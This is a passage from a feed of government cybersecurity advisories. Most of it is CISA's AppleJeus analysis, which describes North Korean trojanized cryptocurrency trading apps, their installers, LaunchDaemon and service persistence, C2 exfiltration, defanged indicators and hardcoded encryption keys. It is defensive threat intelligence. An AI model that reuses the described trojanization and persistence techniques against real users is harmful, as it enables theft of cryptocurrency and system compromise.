https://www.cisecurity.org/controls/ https://www.cisecurity.org/ms-isac/ Australia, Canada, New Zealand, the United Kingdom, and the United States Joint Advisory on Technical Approaches to Uncovering and Remediating Malicious Activity  https://us-cert.cisa.gov/ncas/alerts/aa20-245a  CISA and MS-ISAC’s Ransomware Guide  https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf References [1] Australian Cyber Security Centre (ACSC) [2] New Zealand National Cyber Security Centre (NZ NCSC) [3] Singapore Cyber Security Agency (CSA) [4] United Kingdom National Cyber Security Centre (UK NCSC) [5] United States Cybersecurity and Infrastructure Security Agency (CISA) [6] United States Multi-State Information Sharing and Analysis Center (MS-ISAC) [7] Accellion Press Release: Update to Recent FTA Security Incident [8] Accellion Press Release: Update to Recent FTA Security Incident [9] Accellion Announcement: End-of-Life for Legacy FTA Software Revisions February 24, 2021: Initial Version This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-048A: AppleJeus: Analysis of North Korea’s Cryptocurrency Malware
    by CISA on 17 Febbraio 2021 at 4:00 pm

    Original release date: February 17, 2021 | Last revised: April 15, 2021SummaryThis Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. This joint advisory is the result of analytic efforts among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Treasury (Treasury) to highlight the cyber threat to cryptocurrency posed by North Korea, formally known as the Democratic People’s Republic of Korea (DPRK), and provide mitigation recommendations. Working with U.S. government partners, FBI, CISA, and Treasury assess that Lazarus Group—which these agencies attribute to North Korean state-sponsored advanced persistent threat (APT) actors—is targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency. These cyber actors have targeted organizations for cryptocurrency theft in over 30 countries during the past year alone. It is likely that these actors view modified cryptocurrency trading applications as a means to circumvent international sanctions on North Korea—the applications enable them to gain entry into companies that conduct cryptocurrency transactions and steal cryptocurrency from victim accounts. As highlighted in FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks and Guidance on the North Korean Cyber Threat, North Korea’s state-sponsored cyber actors are targeting cryptocurrency exchanges and accounts to steal and launder hundreds of millions of dollars in cryptocurrency.[1][2][3] The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.cisa.gov/northkorea. The U.S. Government has identified malware and indicators of compromise (IOCs) used by the North Korean government to facilitate cryptocurrency thefts; the cybersecurity community refers to this activity as “AppleJeus.” This report catalogues AppleJeus malware in detail. North Korea has used AppleJeus malware posing as cryptocurrency trading platforms since at least 2018. In most instances, the malicious application—seen on both Windows and Mac operating systems—appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate. In addition to infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware. Refer to the following Malware Analysis Reports (MARs) for full technical details of AppleJeus malware and associated IOCs. MAR-10322463-1.v1: AppleJeus – Celas Trade Pro MAR-10322463-2.v1: AppleJeus – JMT Trading MAR-10322463-3.v1: AppleJeus – Union Crypto MAR-10322463-4.v1: AppleJeus – Kupay Wallet MAR-10322463-5.v1: AppleJeus – CoinGoTrade MAR-10322463-6.v1: AppleJeus – Dorusio MAR-10322463-7.v1: AppleJeus – Ants2Whale Click here for a PDF version of this report. Technical DetailsThe North Korean government has used multiple versions of AppleJeus since the malware was initially discovered in 2018. This section outlines seven of the versions below. The MARs listed above provide further technical details of these versions. Initially, HIDDEN COBRA actors used websites that appeared to host legitimate cryptocurrency trading platforms to infect victims with AppleJeus; however, these actors are now also using other initial infection vectors, such as phishing, social networking, and social engineering techniques, to get users to download the malware. Targeted Nations HIDDEN COBRA actors have targeted institutions with AppleJeus malware in several sectors, including energy, finance, government, industry, technology, and telecommunications. Since January 2020, the threat actors have targeted these sectors in the following countries: Argentina, Australia, Belgium, Brazil, Canada, China, Denmark, Estonia, Germany, Hong Kong, Hungary, India, Ireland, Israel, Italy, Japan, Luxembourg, Malta, the Netherlands, New Zealand, Poland, Russia, Saudi Arabia, Singapore, Slovenia, South Korea, Spain, Sweden, Turkey, the United Kingdom, Ukraine, and the United States (figure 1).    Figure 1: Countries targeted with AppleJeus by HIDDEN COBRA threat actors since 2020 AppleJeus Versions Note The version numbers used for headings in this document correspond to the order the AppleJeus campaigns were identified in open source or through other investigative means. These versions may or may not be in the correct order to develop or deploy the AppleJeus campaigns. AppleJeus Version 1: Celas Trade Pro Introduction and Infrastructure In August 2018, open-source reporting disclosed information about a trojanized version of a legitimate cryptocurrency trading application on an undisclosed victim’s computer. The malicious program, known as Celas Trade Pro, was a modified version of the benign Q.T. Bitcoin Trader application. This incident led to the victim company being infected with a Remote Administration Tool (RAT) known as FALLCHILL, which was attributed to North Korea (HIDDEN COBRA) by the U.S. Government. FALLCHILL is a fully functional RAT with multiple commands that the adversary can issue from a command and control (C2) server to infected systems via various proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware (Develop Capabilities: Malware [T1587.001]). Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.[4] Further research revealed that a phishing email from a Celas LLC company (Phishing: Spearphishing Link [T1566.002]) recommended the trojanized cryptocurrency trading application to victims. The email provided a link to the Celas’ website, celasllc[.]com (Acquire Infrastructure: Domain [T1583.001]), where the victim could download a Windows or macOS version of the trojanized application. The celasllc[.]com domain resolved to the following Internet Protocol (IP) addresses from May 29, 2018, to January 23, 2021. 45.199.63[.]220 107.187.66[.]103 145.249.106[.]19 175.29.32[.]160 185.142.236[.]213 185.181.104[.]82 198.251.83[.]27 208.91.197[.]46 209.99.64[.]18 The celasllc[.]com domain had a valid Sectigo (previously known as Comodo) Secure Sockets Layer (SSL) certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence. Celas Trade Pro Application Analysis Windows Program The Windows version of the malicious Celas Trade Pro application is an MSI Installer (.msi). The MSI Installer installation package comprises a software component and an application programming interface (API) that Microsoft uses for the installation, maintenance, and removal of software. The installer looks legitimate and is signed by a valid Sectigo certificate that was purchased by the same user as the SSL certificate for celasllc[.]com (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002]). Once permission is granted, the threat actor is able to run the program with elevated privileges (Abuse Elevation Control Mechanism [T1548]) and MSI executes the following actions. Installs CelasTradePro.exe in folder C:\Program Files (x86)\CelasTradePro Installs Updater.exe in folder C:\Program Files (x86)\CelasTradePro Runs Updater.exe with the CheckUpdate parameters The CelasTradePro.exe program asks for the user’s exchange and loads a legitimate-looking cryptocurrency trading platform—very similar to the benign Q.T. Bitcoin Trader—that exhibits no signs of malicious activity. The Updater.exe program has the same program icon as CelasTradePro.exe. When run, it checks for the CheckUpdate parameter, collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR encryption, and sends information to a C2 website (Exfiltration Over C2 Channel [T1041]). macOS X Program The macOS version of the malicious application is a DMG Installer that has a disk image format that Apple commonly uses to distribute software over the internet. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). It has very similar functionality to the Windows version. The installer executes the following actions. Installs CelasTradePro in folder /Applications/CelasTradePro.app/Contents/MacOS/ Installs Updater in folder /Applications/CelasTradePro.app/Contents/MacOS Executes a postinstall script Moves .com.celastradepro.plist to folder LaunchDaemons Runs Updater with the CheckUpdate parameter CelasTradePro asks for the user’s exchange and loads a legitimate-looking cryptocurrency trading platform—very similar to the benign Q.T. Bitcoin Trader—that exhibits no signs of malicious activity. Updater checks for the CheckUpdate parameter and, when found, it collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). This process helps the adversary obtain persistence on a victim’s network. The postinstall script is a sequence of instructions that runs after successfully installing an application (Command and Scripting Interpreter: Unix Shell [T1059.004]). This script moves property list (plist) file .com.celastradepro.plist from the installer package to the LaunchDaemons folder (Scheduled Task/Job: Launchd [T1053.004]). The leading “.” makes it unlisted in the Finder app or default Terminal directory listing (Hide Artifacts: Hidden Files and Directories [T1564.001]). Once in the folder, this property list (plist) file will launch the Updater program with the CheckUpdate parameter on system load as Root for every user. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches the Updater program with the CheckUpdate parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]). Payload After a cybersecurity company published a report detailing the above programs and their malicious extras, the website was no longer accessible. Since this site was the C2 server, the payload cannot be confirmed. The cybersecurity company that published the report states the payload was an encrypted and obfuscated binary (Obfuscated Files or Information [T1027]), which eventually drops FALLCHILL onto the machine and installs it as a service (Create or Modify System Process: Windows Service [T1543.003]). FALLCHILL malware uses an RC4 encryption algorithm with a 16-byte key to protect its communications (Encrypted Channel: Symmetric Cryptography [T1573.001]). The key employed in these versions has also been used in a previous version of FALLCHILL.[5][6] For more details on AppleJeus Version 1: Celas Trade Pro, see MAR-10322463-1.v1. AppleJeus Version 2: JMT Trading Introduction and Infrastructure In October 2019, a cybersecurity company identified a new version of the AppleJeus malware—JMT Trading—thanks to its many similarities to the original AppleJeus malware. Again, the malware was in the form of a cryptocurrency trading application, which a legitimate-looking company, called JMT Trading, marketed and distributed on their website, jmttrading[.]org (Acquire Infrastructure: Domain [T1583.001]). This website contained a “Download from GitHub” button, which linked to JMT Trading’s GitHub page (Acquire Infrastructure: Web Services [T1583.006]), where Windows and macOS X versions of the JMT Trader application were available for download (Develop Capabilities: Malware [T1587.001]). The GitHub page also included .zip and tar.gz files containing the source code. The jmttrading[.]org domain resolved to the following IP addresses from October 15, 2016, to January 22, 2021. 45.33.2[.]79 45.33.23[.]183 45.56.79[.]23 45.79.19[.]196 96.126.123[.]244 146.112.61[.]107 184.168.221[.]40 184.168.221[.]57 198.187.29[.]20 198.54.117[.]197 198.54.117[.]198 198.54.117[.]199 198.54.117[.]200 198.58.118[.]167 The jmttrading[.]org domain had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence. The current SSL certificate was issued by Let’s Encrypt. JMT Trading Application Analysis Windows Program The Windows version of the malicious cryptocurrency application is an MSI Installer. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002]). Once permission is granted, the MSI executes the following actions. Installs JMTTrader.exe in folder C:\Program Files (x86)\JMTTrader Installs CrashReporter.exe in folder C:\Users\<username>\AppData\Roaming\JMTTrader Runs CrashReporter.exe with the Maintain parameter The JMTTrader.exe program asks for the user’s exchange and loads a legitimate-looking cryptocurrency trading platform—very similar to CelasTradePro.exe and the benign Q.T. Bitcoin Trader—that exhibits no signs of malicious activity. The program CrashReporter.exe is heavily obfuscated with the ADVObfuscation library, renamed “snowman” (Obfuscated Files or Information [T1027]). When run, it checks for the Maintain parameter and collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). The program also creates a scheduled SYSTEM task, named JMTCrashReporter, which runs CrashReporter.exe with the Maintain parameter at any user’s login (Scheduled Task/Job: Scheduled Task [T1053.005]). macOS X Program The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions. Installs JMTTrader in folder /Applications/JMTTrader.app/Contents/MacOS/ Installs .CrashReporter in folder /Applications/JMTTrader.app/Contents/Resources/ Note: the leading “.” makes it unlisted in the Finder app or default Terminal directory listing. Executes a postinstall script Moves .com.jmttrading.plist to folder LaunchDaemons Changes the file permissions on the plist Runs CrashReporter with the Maintain parameter Moves .CrashReporter to folder /Library/JMTTrader/CrashReporter Makes .CrashReporter executable The JMTTrader program asks for the user’s exchange and loads a legitimate-looking cryptocurrency trading platform—very similar to CelasTradePro and the benign Q.T. Bitcoin Trader—that exhibits no signs of malicious activity. The CrashReporter program checks for the Maintain parameter and is not obfuscated. This lack of obfuscation makes it easier to determine the program’s functionality in detail. When it finds the Maintain parameter, it collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). The postinstall script has similar functionality to the one used by CelasTradePro, but it has a few additional features (Command and Scripting Interpreter: Unix Shell [T1059.004]). It moves the property list (plist) file .com.jmttrading.plist from the Installer package to the LaunchDaemons folder (Scheduled Task/Job: Launchd [T1053.004]), but also changes the file permissions on the plist file. Once in the folder, this property list (plist) file will launch the CrashReporter program with the Maintain parameter on system load as Root for every user. Also, the postinstall script moves the .CrashReporter program to a new location /Library/JMTTrader/CrashReporter and makes it executable. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]). Payload Soon after the cybersecurity company tweeted about JMT Trader on October 11, 2019, the files on GitHub were updated to clean, non-malicious installers. Then on October 13, 2019, a different cybersecurity company published an article detailing the macOS X JMT Trader, and soon after, the C2 beastgoc[.]com website went offline. There is not a confirmed sample of the payload to analyze at this point. For more details on AppleJeus Version 2: JMT Trading, see MAR-10322463-2.v1. AppleJeus Version 3: Union Crypto Introduction and Infrastructure In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. Again, the malware was in the form of a cryptocurrency trading application, which was marketed and distributed by a legitimate-looking company, called Union Crypto, on their website, unioncrypto[.]vip (Acquire Infrastructure: Domain [T1583.001]). Although this website is no longer available, a cybersecurity researcher discovered a download link, https://www.unioncrypto[.]vip/download/W6c2dq8By7luMhCmya2v97YeN, recorded on VirusTotal for the macOS X version of UnionCryptoTrader. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a “Telegram Downloads” folder on an unnamed victim.[7] The unioncrypto[.]vip domain resolved to the following IP addresses from June 5, 2019, to July 15, 2020. 104.168.167[.]16 198.54.117[.]197 198.54.117[.]198 198.54.117[.]199 198.54.117[.]200 The domain unioncrypto[.]vip had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence. Union Crypto Trader Application Analysis Windows Program The Windows version of the malicious cryptocurrency application is a Windows executable (.exe) (User Execution: Malicious File [T1204.002]), which acts as an installer that extracts a temporary MSI Installer. The Windows program executes the following actions. Extracts UnionCryptoTrader.msi to folder C:\Users\<username>\AppData\Local\Temp\{82E4B719-90F74BD1-9CF1-56CD777E0C42} Runs UnionCryptoUpdater.msi Installs UnionCryptoTrader.exe in folder C:\Program Files\UnionCryptoTrader Installs UnionCryptoUpdater.exe in folder C:\Users\<username>\AppData\Local\UnionCryptoTrader Deletes UnionCryptoUpdater.msi Runs UnionCryptoUpdater.exe The program UnionCryptoTrader.exe loads a legitimate-looking cryptocurrency arbitrage application—defined as “the simultaneous buying and selling of securities, currency, or commodities in different markets or in derivative forms to take advantage of differing prices for the same asset”—which exhibits no signs of malicious activity. This application is very similar to another cryptocurrency arbitrage application known as Blackbird Bitcoin Arbitrage.[8] The program UnionCryptoUpdater.exe first installs itself as a service (Create or Modify System Process: Windows Service [T1543.003]), which will automatically start when any user logs on (Boot or Logon Autostart Execution [T1547]). The service is installed with a description stating it “Automatically installs updates for Union Crypto Trader.” When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information in a string that is MD5 hashed and stored in the auth_signature variable before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]). macOS X Program The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions. Installs UnionCryptoTrader in folder /Applications/UnionCryptoTrader.app/Contents/MacOS/ Installs .unioncryptoupdater in folder /Applications/UnionCryptoTrader.app/Contents/Resources/ Note: the leading “.” makes it unlisted in the Finder app or default Terminal directory listing Executes a postinstall script Moves .vip.unioncrypto.plist to folder LaunchDaemons Changes the file permissions on the plist to Root Runs unioncryptoupdater Moves .unioncryptoupdater to folder /Library/UnionCrypto/unioncryptoupdater Makes .unioncryptoupdater executable The UnionCryptoTrader program loads a legitimate-looking cryptocurrency arbitrage application, which exhibits no signs of malicious activity. The application is very similar to another cryptocurrency arbitrage application known as Blackbird Bitcoin Arbitrage. The .unioncryptoupdater program is signed ad-hoc, meaning it is not signed with a valid code-signing identity. When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information in a string that is MD5 hashed and stored in the auth_signature variable before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]). The postinstall script has similar functionality to the one used by JMT Trading (Command and Scripting Interpreter: Unix Shell [T1059.004]). It moves the property list (plist) file .vip.unioncrypto.plist from the Installer package to the LaunchDaemons folder (Scheduled Task/Job: Launchd [T1053.004]), but also changes the file permissions on the plist file to Root. Once in the folder, this property list (plist) file will launch the .unioncryptoupdater on system load as Root for every user. The postinstall script moves the .unioncryptoupdater program to a new location /Library/UnionCrypto/unioncryptoupdater and makes it executable. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches .unioncryptoupdater and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]). Payload The payload for the Windows malware is a Windows Dynamic-Link-Library. UnionCryptoUpdater.exe does not immediately download the stage 2 malware but instead downloads it after a time specified by the C2 server. This delay could be implemented to prevent researchers from directly obtaining the stage 2 malware. The macOS X malware’s payload could not be downloaded, as the C2 server is no longer accessible. Additionally, none of the open-source reporting for this sample contained copies of the macOS X payload. The macOS X payload is likely similar in functionality to the Windows stage 2 detailed above. For more details on AppleJeus Version 3: Union Crypto, see MAR-10322463-3.v1. Commonalities between Celas Trade Pro, JMT Trading, and Union Crypto Hardcoded Values In each AppleJeus version, there are hardcoded values used for encryption or to create a signature when combined with the time (table 1). Table 1: AppleJeus hardcoded values and uses AppleJeus Version Value Use 1: Celas Trade Pro Moz&Wie;#t/6T!2y XOR encryption to send data 1: Celas Trade Pro W29ab@ad%Df324V$Yd RC4 decryption 2: JMT Trader Windows X,%`PMk--Jj8s+6=15:20:11 XOR encryption to send data 2: JMT Trader OSX X,%`PMk--Jj8s+6=\x02 XOR encryption to send data 3: Union Crypto Trader 12GWAPCT1F0I1S14 Combined with time for signature   The Union Crypto Trader and Celas LLC (XOR) values are 16 bytes in length. For JMT Trader, the first 16 bytes of the Windows and macOS X values are identical, and the additional bytes are in a time format for the Windows sample. The structure of a 16-byte value combined with the time is also used in Union Crypto Trader to create the auth_signature. As mentioned, FALLCHILL was reported as the final payload for Celas Trade Pro. All FALLCHILL samples use 16-byte hardcoded RC4 keys for sending data, similar to the 16-byte keys in the AppleJeus samples. Open-Source Cryptocurrency Applications All three AppleJeus samples are bundled with modified copies of legitimate cryptocurrency applications and can be used as originally designed to trade cryptocurrency. Both Celas LLC and JMT Trader modified the same cryptocurrency application, Q.T. Bitcoin Trader; Union Crypto Trader modified the Blackbird Bitcoin Arbitrage application. Postinstall Scripts, Property List Files, and LaunchDaemons The macOS X samples of all three AppleJeus versions contain postinstall scripts with similar logic. The Celas LLC postinstall script only moves the plist file to a new location and launches Updater with the CheckUpdate parameter in the background. The JMT Trader and Union Crypto Trader also perform these actions and have identical functionality. The additional actions performed by both postinstall scripts are to change the file permissions on the plist, make a new directory in the /Library folder, move CrashReporter or UnionCryptoUpdater to the newly created folder, and make them executable. The plist files for all three AppleJeus files have identical functionality. They only differ in the files’ names and one default comment that was not removed from the Celas LLC plist. As the logic and functionality of the postinstall scripts and plist files are almost identical, the LaunchDaemons created also function the same. They will all launch the secondary executable as Root on system load for every user. AppleJeus Version 4: Kupay Wallet Introduction and Infrastructure On March 13, 2020, a new version of the AppleJeus malware was identified. The malware was marketed and distributed by a legitimate-looking company, called Kupay Wallet, on their website kupaywallet[.]com (Acquire Infrastructure: Domain [T1583.001]). The domain www.kupaywallet[.]com resolved to IP address 104.200.67[.]96 from March 20, 2020, to January 16, 2021. CrownCloud US, LLC controlled the IP address (autonomous system number [ASN] 8100), and is located in New York, NY. The domain www.kupaywallet[.]com had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence. Kupay Wallet Application Analysis Windows Program The Windows version of the malicious cryptocurrency application is an MSI Installer. The MSI executes the following actions. Installs Kupay.exe in folder C:\Program Files (x86)\Kupay Installs KupayUpgrade.exe in folder C:\Users\<username>\AppData\Roaming\KupaySupport Runs KupayUpgrade.exe The program Kupay.exe loads a legitimate-looking cryptocurrency wallet platform, which exhibits no signs of malicious activity and is very similar to an open-source platform known as Copay, distributed by Atlanta-based company BitPay. The program KupayUpgrade.exe first installs itself as a service (Create or Modify System Process: Windows Service [T1543.003]), which will automatically start when any user logs on (Boot or Logon Autostart Execution [T1547]). The service is installed with a description stating it is an “Automatic Kupay Upgrade.” When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information in strings before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]). macOS X Program The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions. Installs Kupay in folder /Applications/Kupay.app/Contents/MacOS/ Installs kupay_upgrade in folder /Applications/Kupay.app/Contents/MacOS/ Executes a postinstall script Creates KupayDaemon folder in /Library/Application Support folder Moves kupay_upgrade to the new folder Moves com.kupay.pkg.wallet.plist to folder /Library/LaunchDaemons/ Runs the command launchctl load to load the plist without a restart Runs kupay_upgrade in the background Kupay is likely a copy of an open-source cryptocurrency wallet application, loads a legitimate-looking wallet program (fully functional), and its functionality is identical to the Windows Kupay.exe program. The kupay_upgrade program calls its function CheckUpdate (which contains most of the logic functionality of the malware) and sends a POST to the C2 server with a connection named “Kupay Wallet 9.0.1 (Check Update Osx)” (Application Layer Protocol: Web Protocols [T1071.001]). If the C2 server returns a file, it is decoded and written to the victim’s folder /private/tmp/kupay_update with permissions set by the command chmod 700 (only the user can read, write, and execute) (Command and Scripting Interpreter [T1059]). Stage 2 is then launched, and the malware, kupay_upgrade, returns to sleeping and checking in with the C2 server at predetermined intervals (Application Layer Protocol: Web Protocols [T1071.001]). The postinstall script has similar functionality to other AppleJeus scripts (Command and Scripting Interpreter: Unix Shell [T1059.004]). It creates the KupayDaemon folder in /Library/Application Support folder and then moves kupay_upgrade to the new folder. It moves the property list (plist) file com.kupay.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). The script runs the command launchctl load to load the plist without a restart (Command and Scripting Interpreter [T1059]). But, since the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches kupay_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]). Payload The Windows malware’s payload could not be downloaded since the C2 server is no longer accessible. Additionally, none of the open-source reporting for this sample contained copies of the payload. The Windows payload is likely similar in functionality to the macOS X stage 2 detailed below. The stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc. For more details on AppleJeus Version 4: Kupay Wallet, see MAR-10322463-4.v1. AppleJeus Version 5: CoinGoTrade Introduction and Infrastructure In early 2020, another version of the AppleJeus malware was identified. This time the malware was marketed and distributed by a legitimate-looking company called CoinGoTrade on their website coingotrade[.]com (Acquire Infrastructure: Domain [T1583.001]). The domain CoinGoTrade[.]com resolved to IP address 198.54.114[.]175 from February 28, 2020, to January 23, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN for Dorusio[.]com and Ants2Whale[.]com. The domain CoinGoTrade[.]com had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence. CoinGoTrade Application Analysis Windows Program The Windows version of the malicious application is an MSI Installer. The installer appears to be legitimate and will execute the following actions. Installs CoinGoTrade.exe in folder C:\Program Files (x86)\CoinGoTrade Installs CoinGoTradeUpdate.exe in folder C:\Users\<username>\AppData\Roaming\CoinGoTradeSupport Runs CoinGoTradeUpdate.exe CoinGoTrade.exe loads a legitimate-looking cryptocurrency wallet platform with no signs of malicious activity and is a copy of an open-source cryptocurrency application. CoinGoTradeUpdate.exe first installs itself as a service (Create or Modify System Process: Windows Service [T1543.003]), which will automatically start when any user logs on (Boot or Logon Autostart Execution [T1547]). The service is installed with a description stating it is an “Automatic CoinGoTrade Upgrade.” When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information in strings before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]). macOS X Program The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions. Installs CoinGoTrade in folder /Applications/CoinGoTrade.app/Contents/MacOS/ Installs CoinGoTradeUpgradeDaemon in folder /Applications/CoinGoTrade.app/Contents/MacOS/ Executes a postinstall script Creates CoinGoTradeService folder in /Library/Application Support folder Moves CoinGoTradeUpgradeDaemon to the new folder Moves com.coingotrade.pkg.product.plist to folder /Library/LaunchDaemons/ Runs CoinGoTradeUpgradeDaemon in the background The CoinGoTrade program is likely a copy of an open-source cryptocurrency wallet application and loads a legitimate-looking, fully functional wallet program). The CoinGoTradeUpgradeDaemon program calls its function CheckUpdate (which contains most of the logic functionality of the malware) and sends a POST to the C2 server with a connection named “CoinGoTrade 1.0 (Check Update Osx)” (Application Layer Protocol: Web Protocols [T1071.001]). If the C2 server returns a file, it is decoded and written to the victim’s folder /private/tmp/updatecoingotrade with permissions set by the command chmod 700 (only the user can read, write, and execute) (Command and Scripting Interpreter [T1059]). Stage 2 is then launched, and the malware, CoinGoTradeUpgradeDaemon, returns to sleeping and checking in with the C2 server at predetermined intervals (Application Layer Protocol: Web Protocols [T1071.001]). The postinstall script has similar functionality to the other scripts (Command and Scripting Interpreter: Unix Shell [T1059.004]) and installs CoinGoTrade and CoinGoTradeUpgradeDaemon in folder /Applications/CoinGoTrade.app/Contents/MacOS/. It moves the property list (plist) file com.coingotrade.pkg.product.plist to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CoinGoTradeUpgradeDaemon and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]). Payload The Windows malware’s payload could not be downloaded because the C2 server is no longer accessible. Additionally, none of the open-source reporting for this sample contained copies of the payload. The Windows payload is likely similar in functionality to the macOS X stage 2 detailed below. The stage 2 payload for the macOS X malware was no longer available from the specified download URL. Still, a file was submitted to VirusTotal by the same user on the same date as the macOS X CoinGoTradeUpgradeDaemon. These clues suggest that the submitted file may be related to the macOS X version of the malware and the downloaded payload. The file prtspool is a 64-bit Mach-O executable with a large variety of features that have all been confirmed as functionality. The file has three C2 URLs hardcoded into the file and communicates to these with HTTP POST multipart-form data boundary string. Like other HIDDEN COBRA malware, prtspool uses format strings to store data collected about the system and sends it to the C2s. For more details on AppleJeus Version 5: CoinGoTrade, see MAR-10322463-5.v1. AppleJeus Version 6: Dorusio Introduction and Infrastructure In March 2020, an additional version of the AppleJeus malware was identified. This time the malware was marketed and distributed by a legitimate-looking company called Dorusio on their website, dorusio[.]com (Acquire Infrastructure: Domain [T1583.001]). Researchers collected samples for Windows and macOS X versions of the Dorusio Wallet (Develop Capabilities: Malware [T1587.001]). As of at least early 2020, the actual download links result in 404 errors. The download page has release notes with version revisions claiming to start with version 1.0.0, released on April 15, 2019. The domain dorusio[.]com resolved to IP address 198.54.115[.]51 from March 30, 2020 to January 23, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN for CoinGoTrade[.]com and Ants2Whale[.]com. The domain dorusio[.]com had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence. Dorusio Application Analysis Windows Program The Windows version of the malicious application is an MSI Installer. The installer appears to be legitimate and will install the following two programs. Installs Dorusio.exe in folder C:\Program Files (x86)\Dorusio Installs DorusioUpgrade.exe in folder C:\Users\<username>\AppData\Roaming\DorusioSupport Runs DorusioUpgrade.exe The program, Dorusio.exe, loads a legitimate-looking cryptocurrency wallet platform with no signs of malicious activity and is a copy of an open-source cryptocurrency application. The program DorusioUpgrade.exe first installs itself as a service (Create or Modify System Process: Windows Service [T1543.003]), which will automatically start when any user logs on (Boot or Logon Autostart Execution [T1547]). The service is installed with a description stating it “Automatic Dorusio Upgrade.” When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information in strings before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]). macOS X Program The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but 